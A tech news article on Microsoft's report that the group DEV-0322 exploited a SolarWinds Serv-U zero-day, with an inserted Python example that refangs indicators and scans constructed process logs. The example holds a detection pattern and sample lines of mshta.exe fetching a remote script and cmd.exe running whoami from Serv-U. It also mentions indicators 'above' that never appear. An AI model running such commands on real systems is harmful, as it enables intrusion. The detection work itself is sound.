The SolarWinds attack has been one of the headaches that tech companies have encountered, especially over the past months. This time, Microsoft spotted a group of Chinese hackers using a zero-day to exploit vulnerabilities in SolarWinds software.
If this happens, the software company might be at the brink of a malware infection, which could result in data alteration or theft.
Microsoft Notes the Most Recent SolarWinds Attack
According to the company's blog on Tuesday, July 13, the suspected hackers from China were exploiting SolarWinds in an attempt to take down its systems. The same group was also discovered to be hitting several sectors across the United States.
Mainly, cybercriminals have been targeting important systems in the military research and development sector.
As a first step in the investigation, Microsoft aims to identify the group behind the attack. The Redmond giant has named the actor DEV-0322, since it does not yet know the whereabouts of the attackers.
Microsoft said that the group has been actively moving through the systems using a commercial VPN and routers for its cyberattacks. The company said that it has now informed the affected organizations about the latest hack.
Microsoft Notifies SolarWinds About the Attack
In an updated statement, SolarWinds said that Microsoft contacted it after learning that the suspected Chinese hackers had broken in through its Serv-U software. The attack was linked to the company's FTP and file transfer product, which has since been patched.
Back in December, SolarWinds was featured in several headlines due to the controversial cyberattack that happened. At that time, the experts said that the company's password was weak, which is why the hackers could easily access its systems.
Following the case of the solarwinds123 password, some experts believed that the software giant's exposure did not stem from its easy password alone.
Huntress co-founder Kyle Hanslovan said that one of the reasons SolarWinds was easy to penetrate was the "malicious updates" that lived in its systems for many days.
The month after the incident with SolarWinds' password, US intelligence boldly named Russia as being behind the attacks on the company. The authorities also believed that the hackers wanted to compromise many US computers at that time.
Microsoft Provides Indicators For SolarWinds Attack
Ars Technica reported that Microsoft released the indicators of compromise that defenders may encounter. These indicators can tell you whether your computer has been exposed to the hack.
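Published indicators like the ones above come defanged ("hxxp://", "[.]") so they cannot be clicked by accident. As an added illustration (not code from the article or from Microsoft's advisory), the Python below refangs such indicators and scans constructed process-creation log lines for them; the indicator values, log format and sample lines are constructed placeholders, not the real ones.

```python
import re

# Refang a defanged indicator before matching it against real log data.
def refang(indicator: str) -> str:
    return (indicator.replace("[.]", ".")
                     .replace("hxxps://", "https://")
                     .replace("hxxp://", "http://"))

# Constructed placeholder indicators (RFC 5737 documentation range), not the
# real ones published for this campaign.
DEFANGED_IOCS = ["192[.]0[.]2[.]10", "hxxp://192[.]0[.]2[.]10/a"]

# mshta.exe fetching a script straight from a bare-IP URL is the shape of the
# command-line indicators described; match it independently of the exact IP.
MSHTA_REMOTE = re.compile(r"mshta\.exe\s+https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I)

def scan(lines, defanged_iocs=DEFANGED_IOCS):
    """Return (line_number, reason) for every log line that contains a known
    indicator or matches the mshta behavioural pattern."""
    iocs = [refang(i) for i in defanged_iocs]
    hits = []
    for n, line in enumerate(lines, start=1):
        for ioc in iocs:
            if ioc in line:
                hits.append((n, f"ioc:{ioc}"))
                break
        else:
            if MSHTA_REMOTE.search(line):
                hits.append((n, "behaviour:mshta-remote-url"))
    return hits

# Constructed sample process-creation log lines (parent -> child), not real telemetry.
SAMPLE_LOG = [
    "2021-07-13T10:01:02 Serv-U.exe -> cmd.exe /c whoami",
    "2021-07-13T10:01:05 Serv-U.exe -> mshta.exe http://192.0.2.10/a",
    "2021-07-13T10:02:00 svchost.exe -> mshta.exe http://203.0.113.7/x",
    "2021-07-13T10:03:00 explorer.exe -> notepad.exe C:\\Users\\ann\\notes.txt",
]

if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

The behavioural rule catches the third line even though its IP is not on the indicator list, which is why pattern-based detections should sit beside exact-match IoCs.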
Recently, Microsoft released an emergency patch for the PrintNightmare zero-day vulnerability. However, that update was unable to fully fix the issue.
This article is owned by Tech Times
Written by Joseph Henry